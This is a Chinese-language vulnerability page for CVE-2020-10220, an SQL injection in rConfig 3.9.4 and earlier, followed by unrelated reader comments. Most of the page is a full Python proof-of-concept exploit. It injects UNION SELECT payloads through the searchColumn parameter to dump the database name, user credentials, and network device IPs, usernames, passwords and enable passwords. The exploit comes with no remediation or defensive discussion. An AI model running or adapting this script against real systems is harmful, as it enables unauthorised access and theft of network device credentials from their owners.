CVE-2020-10220
漏洞描述:此漏洞会影响未知部件文件 commands.inc.php的组件Web Interface。 手动调试的软件参数:searchColumn 该部分从属于:Parameter可导致 SQL注入
rConfig 3.9.4及之前版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
影响版本:rConfig 3.9.4及之前版本
EXP:
import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print ("rconfig 3.9 - SQL Injection PoC")
if len(sys.argv) != 2:
print ("[+] Usage : ./rconfig_exploit.py https://target")
exit()
vuln_page="/commands.inc.php"
vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
given_target = sys.argv[1]
target = given_target
target += vuln_page
target += vuln_parameters
request = requests.session()
dashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)
def extractDBinfos(myTarget=None,myPayload=None):
"""
Extract information from database
Args:
- target+payload (String)
Returns:
- payload result (String)
"""
result = ""
encoded_request = myTarget+myPayload
exploit_req = request.get(encoded_request)
if '[PWN]' in str(exploit_req.content):
result = str(exploit_req.content).split('[PWN]')[1]
else:
result="Maybe no more information ?"
return result
if dashboard_request.status_code != 404:
print ("[+] Triggering the payloads on "+given_target+vuln_page)
# get the db name
print ("[+] Extracting the current DB name :")
db_payload = "%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
db_name = extractDBinfos(target,db_payload)
print (db_name)
# DB extract users
print ("[+] Extracting 10 first users :")
for i in range (0, 10):
user1_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".users+limit+"+str(i)+","+str(i+1)+"),NULL--"
user_h = extractDBinfos(target,user1_payload)
#print ("[+] Dump device "+str(i))
print (user_h)
# DB extract devices information
print ("[+] Extracting 10 first devices :")
for i in range (0, 10):
device_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".nodes+limit+"+str(i)+","+str(i+1)+"),NULL--"
device_h = extractDBinfos(target,device_payload)
#print ("[+] Dump device "+str(i))
print (device_h)
print ("Done")
else:
print ("[-] Please verify the URI")
exit()
漏洞复现
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
cesfe 1个月前0
好的,谢谢昶之琴 1个月前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 1个月前0
帆软部署 ,访问的地址访问不到昶之琴 2年前0
我以为只要提交就行了好想告诉你 2年前0
花巨资看一下